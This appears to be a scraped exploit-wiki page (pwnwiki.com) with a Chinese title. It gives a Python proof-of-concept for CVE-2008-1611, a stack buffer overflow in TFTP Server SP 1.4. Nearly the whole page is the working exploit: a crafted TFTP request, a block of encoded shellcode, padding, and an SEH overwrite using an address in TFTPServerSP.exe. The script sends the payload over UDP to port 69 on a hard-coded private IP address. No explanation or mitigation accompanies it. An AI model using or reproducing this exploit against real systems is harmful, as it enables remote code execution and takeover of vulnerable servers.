Loading
0

CVE-2008-1611 TFTP Server SP 1.4堆栈缓冲区溢出漏洞

PWNWIK.COM

,

POC

import struct
import socket

# CVE-2008-1611 PoC written by Axua

prefix = "\x00\x02\x2f\x2e\x3a\x2f"
suffix = "\x00\x00\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00"

shellcode = (
"\xbb\x1b\xd0\x39\x36\xdd\xc7\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x52\x31\x58\x12\x03\x58\x12\x83\xdb\xd4\xdb\xc3\x27\x3c\x99"
"\x2c\xd7\xbd\xfe\xa5\x32\x8c\x3e\xd1\x37\xbf\x8e\x91\x15\x4c"
"\x64\xf7\x8d\xc7\x08\xd0\xa2\x60\xa6\x06\x8d\x71\x9b\x7b\x8c"
"\xf1\xe6\xaf\x6e\xcb\x28\xa2\x6f\x0c\x54\x4f\x3d\xc5\x12\xe2"
"\xd1\x62\x6e\x3f\x5a\x38\x7e\x47\xbf\x89\x81\x66\x6e\x81\xdb"
"\xa8\x91\x46\x50\xe1\x89\x8b\x5d\xbb\x22\x7f\x29\x3a\xe2\xb1"
"\xd2\x91\xcb\x7d\x21\xeb\x0c\xb9\xda\x9e\x64\xb9\x67\x99\xb3"
"\xc3\xb3\x2c\x27\x63\x37\x96\x83\x95\x94\x41\x40\x99\x51\x05"
"\x0e\xbe\x64\xca\x25\xba\xed\xed\xe9\x4a\xb5\xc9\x2d\x16\x6d"
"\x73\x74\xf2\xc0\x8c\x66\x5d\xbc\x28\xed\x70\xa9\x40\xac\x1c"
"\x1e\x69\x4e\xdd\x08\xfa\x3d\xef\x97\x50\xa9\x43\x5f\x7f\x2e"
"\xa3\x4a\xc7\xa0\x5a\x75\x38\xe9\x98\x21\x68\x81\x09\x4a\xe3"
"\x51\xb5\x9f\xa4\x01\x19\x70\x05\xf1\xd9\x20\xed\x1b\xd6\x1f"
"\x0d\x24\x3c\x08\xa4\xdf\xd7\xf7\x91\xbd\x33\x90\xe3\x41\x2d"
"\x3c\x6d\xa7\x27\xac\x3b\x70\xd0\x55\x66\x0a\x41\x99\xbc\x77"
"\x41\x11\x33\x88\x0c\xd2\x3e\x9a\xf9\x12\x75\xc0\xac\x2d\xa3"
"\x6c\x32\xbf\x28\x6c\x3d\xdc\xe6\x3b\x6a\x12\xff\xa9\x86\x0d"
"\xa9\xcf\x5a\xcb\x92\x4b\x81\x28\x1c\x52\x44\x14\x3a\x44\x90"
"\x95\x06\x30\x4c\xc0\xd0\xee\x2a\xba\x92\x58\xe5\x11\x7d\x0c"
"\x70\x5a\xbe\x4a\x7d\xb7\x48\xb2\xcc\x6e\x0d\xcd\xe1\xe6\x99"
"\xb6\x1f\x97\x66\x6d\xa4\xa9\x97\xbf\x31\x3d\x0e\x2a\x78\x23"
"\xb1\x81\xbf\x5a\x32\x23\x40\x99\x2a\x46\x45\xe5\xec\xbb\x37"
"\x76\x99\xbb\xe4\x77\x88")

padding1 = "\x41" * 236
padding2 = "\x42" * (984 - len(shellcode))

far_jump = "\xE9\x23\xFC\xFF\xFF"

nseh = "\xEB\xF9\x90\x90" # jmp short -8
seh = "\x8c\x2b\x40" # POP EDI; POP EBP; RET; @ TFTPServerSP.exe # partial overwrite 0x00402b8c

payload =  prefix
payload += padding1
payload += shellcode
payload += padding2
payload += far_jump
payload += nseh 
payload += seh   
payload += suffix

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(payload, ("192.168.99.155", 69))

pwnwiki.com